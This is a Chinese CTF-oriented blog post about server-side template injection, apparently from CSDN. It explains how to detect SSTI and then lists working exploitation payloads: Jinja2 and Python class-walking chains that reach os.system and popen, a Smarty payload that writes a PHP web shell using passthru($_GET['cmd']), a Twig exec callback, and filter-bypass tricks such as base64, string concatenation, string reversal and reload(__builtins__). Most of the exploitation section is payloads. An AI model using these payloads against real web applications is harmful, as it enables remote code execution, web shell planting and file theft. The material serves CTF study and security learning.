关于SSTI注入的一些理解

最新推荐文章于 2023-08-24 11:22:42 发布
最新推荐文章于 2023-08-24 11:22:42 发布
阅读量826 收藏 5
点赞数 2
分类专栏: CTF 文章标签: ssi php web html python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44477223/article/details/115673318
版权

什么是SST

原理

利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。

用途

让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,这就大大提升了开发效率,良好的设计也使得代码重用变得更加容易。

SSTI是什么

SSTI类似与sql注入,但是与sql有所不同的是,SSTI利用的事故网站的模板引擎,主要是网站处理框架。

  • Python的jinja2 mako tornado django
  • php的smarty twig
  • java的jade velocity

一个模板例子:

$output = $twig->render( $_GET['custom_email'] , array("first_name" => $user.first_name) );

这串代码有一个很明显的XSS,但是它还有更深的危害。

custom_email={{7*7}} // GET 参数
 
49  // $output 结果

如何使用

检测漏洞

文本类

大部分的模板语言支持我们输入 HTML

smarty=Hello {user.name}
Hello user1
 
freemarker=Hello ${username}
Hello newuser
 
any=<b>Hello</b>
<b>Hello<b>

未经过滤的输入会产生 XSS,我们可以利用 XSS 做我们最基本的探针。除此之外,模板语言的语法和 HTML 语法相差甚大,因此我们可以用其独特的语法来探测漏洞。虽然各种模板的实现细节不大一样,不过它们的基本语法大致相同,我们可以发送如下 payload来确认漏洞。

smarty=Hello ${7*7}
Hello 49
 
freemarker=Hello ${7*7}
Hello 49

###代码类
在一些环境下,用户的输入也会被当作模板的可执行代码。比如说变量名.这种情况下,XSS 的方法就无效了。但是我们可以通过破坏 template 语句,并附加注入的HTML标签以确认漏洞:

personal_greeting=username<tag>
Hello
personal_greeting=username}}<tag>
Hello user01 <tag>

判断注入模板

在这里插入图片描述

漏洞利用

jinjia2

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('<command>').read()") }}{% endif %}{% endfor %}

python2

[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].system('ls')
[].__class__.__base__.__subclasses__()[76].__init__.__globals__['os'].system('ls')
"".__class__.__mro__[-1].__subclasses__()[60].__init__.__globals__['__builtins__']['eval']('__import__("os").system("ls")')
"".__class__.__mro__[-1].__subclasses__()[61].__init__.__globals__['__builtins__']['eval']('__import__("os").system("ls")')
"".__class__.__mro__[-1].__subclasses__()[40](filename).read()
"".__class__.__mro__[-1].__subclasses__()[29].__call__(eval,'os.system("ls")')

python3

''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.values()[13]['eval']
"".__class__.__mro__[-1].__subclasses__()[117].__init__.__globals__['__builtins__']['eval']

smarty

一,漏洞确认(查看smarty的版本号){$smarty.version}
二,常规利用方式:(使用{php}{/php}标签来执行被包裹其中的php指令,smarty3弃用)
{php}{/php}
执行php指令,php7无法使用
<script language="php">phpinfo();</script>
三,静态方法
public function getStreamVariable($variable){ $_result = ''; $fp = fopen($variable, 'r+'); if ($fp) { while (!feof($fp) && ($current_line = fgets($fp)) !== false) { $_result .= $current_line; } fclose($fp); return $_result; } $smarty = isset($this->smarty) ? $this->smarty : $this; if ($smarty->error_unassigned) { throw new SmartyException('Undefined stream variable "' . $variable . '"'); } else { return null; } }


payload1:if标签执行PHP命令)
{if phpinfo()}{/if}
{if system('ls')}{/if}
{if system('cat /flag')}{/if}
四,其他payload
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

twig

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

waf绕过

base64

().__class__.__bases__[0].__subclasses__()[40]('r','ZmxhZy50eHQ='.decode('base64')).read()
相当于:
().__class__.__bases__[0].__subclasses__()[40]('r','flag.txt')).read()

字符串拼接:
+号绕过

().__class__.__bases__[0].__subclasses__()[40]('r','fla'+'g.txt')).read()
相当于
().__class__.__bases__[0].__subclasses__()[40]('r','flag.txt')).read()

[::-1]取反绕过

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}

reload方法:

del __builtins__.__dict__['__import__'] # __import__ is the function called by the import statement
 
del __builtins__.__dict__['eval'] # evaluating code could be dangerous
del __builtins__.__dict__['execfile'] # likewise for executing the contents of a file
del __builtins__.__dict__['input'] # Getting user input and evaluating it might be dangerous

当没有过滤reload函数时,我们可以重载builtins

reload(__builtins__)

当不能通过[].class.base.subclasses([60].init.func_globals[‘linecache’].dict.values()[12]直接加载 os 模块

这时候可以使用getattribute+ 字符串拼接 / base64 绕过 例如:

[].__class__.__base__.__subclasses__()[60].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__.values()[12]

等价于:

[].__class__.__base__.__subclasses__()[60].__init__.func_globals['linecache'].__dict__.values()[12]

参考文档:
https://zhuanlan.zhihu.com/p/28823933.
SSTI完全学习.
模板注入总结.

无独有偶o
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SSTI模板注入
Lemon's blog
05-09 2425
前言: 这几天刷题一直遇到考察SSTI模板注入的题,之前也没有好好了解过,如果叙述原理的话需要扎实的python基础,现在python还学的不是太好,就以遇到的CTF题做一个总结。 什么是模板引擎 模板引擎是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的文档,就是将模板文件和数据通过模板引擎生成一个HTML代码。 什么是服务端模板...
fenjing工具,ssti
最新发布
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
SSTI模板注入总结
CyhDl666的博客
03-19 410
文章目录python 模板Flask Jinja 2敏感信息泄露的身份伪造 python 模板 Python的模板有Tornado、Flask、Django 模板引擎通过对模板进行动态的解析,将传入模板引擎的变量进行替换,最终展示给客户 SSTI服务端模板注入正是因为代码中通过不安全的字符串拼接的方式来构造模板文件而且过分信任用户的输入造成的 Flask Jinja 2 语法 {%……%} 语句 {{…}}打印模板输出表达式 {#…#} 注释 #…##行语句 敏感信息泄露的身份伪造 ...
SSTI入门详解
E1even的博客
03-15 5037
关于基于flask的SSTI漏洞的阶段学习小结: SSTI理解SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。 SSTI引发的真正原因: render_template渲染函数的问题 render_template渲染函数是什么: 就是把HTML涉及的页面与用户数据分离开,这样方便展示和管理。当用户输入自己的数据信息,HTML页面可以根据用户自身的信息来展示页面,因此才有了这个函数的使用。 ...
flask python3,flask ssti python2和python3 注入总结和区别
weixin_39942318的博客
03-19 133
总结一下flask ssti注入语句代码import uuidfrom flask import Flask, request, make_response, session,render_template, url_for, redirect, render_template_stringapp=Flask(__name__)app.config['SECRET_KEY']=str(uuid....
SSTI注入,简单记录一下(config)
a3320315的博客
01-28 2500
输入数据有回显,看返回头是python写的后台,猜测有SSTI(加了个php模式的报错和index.php路由不知道有没有骗到某个师傅–) 然后接下来是绕WAF,我写了两个过滤,一个强过滤是匹配{{和}},目的是想让各位师傅用远程SSTI把flag打到自己服务器上。 然后是一个简单的单词匹配过滤os等敏感字符,只要FUZZ一下,再实验一下,会找到config这个大多数poc都用不上且过滤排在较后,...
SSTI
03-09
利用SSTI则需要对目标应用的模板引擎有深入理解,构建有效的注入payload。例如,针对Jinja2模板引擎,攻击者可能尝试`{{ __import__('os').system('ls') }}`这样的payload来执行系统命令。 ### 常见的SSTI攻击场景 ...
flaskssti:测试SSTI
02-21
标题中的“flaskssti”指的是一个与Python web框架Flask相关的项目,可能是一个扩展或教程,专注于“SSTI”(Server-Side Template Injection,服务器端模板注入)。SSTI是一种安全漏洞,允许攻击者通过操纵模板引擎...
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
Server-Side Template Injection (SSTI) 是一种严重的网络安全漏洞,尤其在现代Web应用程序中,它可能导致远程代码执行...通过深入理解和掌握SSTI的检测与利用方法,我们可以更好地应对这种威胁,提高Web应用的安全性。
tplmap.zip
07-26
在使用“tplmap”之前,用户需要了解一些基础知识,例如Web应用的工作原理、模板引擎的语法以及SSTI漏洞的常见利用方法。在实际操作中,用户需要能够理解如何配置和运行工具,如何分析输出结果以确定是否存在漏洞,...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).conc
php之smarty篇(二)--smarty基础
04-06
NULL 博文链接:https://firedragonpzy.iteye.com/blog/1551533
SSTI(模板注入)
xiaolong22333的博客
02-28 1480
概念性的东西这里就不讲了,毕竟像我这种刚开始学ssti,且没什么Python基础的小白来说,要是一上来就巴拉巴拉讲一堆概念,可能直接就懵了。 首先认识一下这个东西 __class__ 它可以用来查看变量所属的类 什么意思呢?动手试一下就知道了。用命令行打开python,输入''.__class__ 可以看到输出了<class 'str'>,表明这是str类,当然还有另外的类型,可以依次输入().__class__,[].__class__,{}.__class__ str(字符串)、di.
从ofcms的模板注入漏洞(CVE-2019-9614)浅析SSTI漏洞
Alexz__的博客
05-04 1682
什么是SSTI漏洞 CVE-2019-9614漏洞复现 ofcms的freemarker模板源码简要分析 壹 什么是SSTI漏洞 SSTI:Server Side Template Injection 服务器端模板注入漏洞 既然是注入漏洞,那么它所运用的核心思想就和XSSSQL注入差不多,都是运用不安全的用户输入,将正常的数据接收处进行恶意输入,导致服务器将用户输入数据当成代码并执行,从而完成一些危险的行为 我们针对SSTI来看,他的主要载体是web站点MVC架构之上,也就是从...
SSTI(模块注入)的简单学习
dbabs的博客
02-05 651
SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。
【网络安全 | 1.5w字总结】SSTI漏洞入门,这一篇就够了。
等风来
08-24 7320
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
服务端模板注入SSTI)上
why811的博客
07-18 749
在handleCache内,首先判断有没有开启options.cache此值默认为空,所以没有进去if区间,然后在elseif处判断了hasTemplate的值是否为空,此值的定义是从arguments.length得到的,所以此值不为空,也没有进入到elseif区间内,然后就到了exports.compile处,这里在调用compile方法时把模板传入,继续跟踪此方法。内建函数很像子变量(也像Java中的方法),它们并不是数据模型中的东西,是Freemarker在数值上添加的。
[CISCN 2019华东南]Web11 和[NISACTF 2022]midlevel
Leaf_initial的博客
04-27 314
Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。
ssti模板注入payload
09-26
关于SSTI模板注入的payload,这取决于模板引擎的类型和具体的注入点。不同的模板引擎可能具有不同的语法和功能,因此payload的编写也会有所差异。一般来说,payload可以包括以下内容: 1. 利用模板语法执行系统命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值